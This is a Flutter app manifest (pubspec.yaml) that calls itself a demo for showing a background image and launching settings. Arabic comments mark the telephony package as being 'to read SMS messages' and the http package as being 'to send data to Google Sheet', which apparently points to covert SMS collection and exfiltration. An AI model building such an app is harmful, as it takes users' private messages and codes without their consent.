name: your_flutter_app
description: A demo app to show background image and launch settings

version: 1.0.0+1

environment:
  sdk: ">=2.17.0 <4.0.0"

dependencies:
  flutter:
    sdk: flutter
  audioplayers: ^5.2.0
  android_intent_plus: ^4.0.3
  dio: ^5.4.1
  path_provider: ^2.1.1
  flutter_local_notifications: ^17.0.0
  http: ^1.1.0              # لإرسال البيانات إلى Google Sheet
  telephony: ^0.2.2          # لقراءة رسائل SMS
  video_player: ^2.6.0
  permission_handler: ^10.4.0
flutter:
  uses-material-design: true
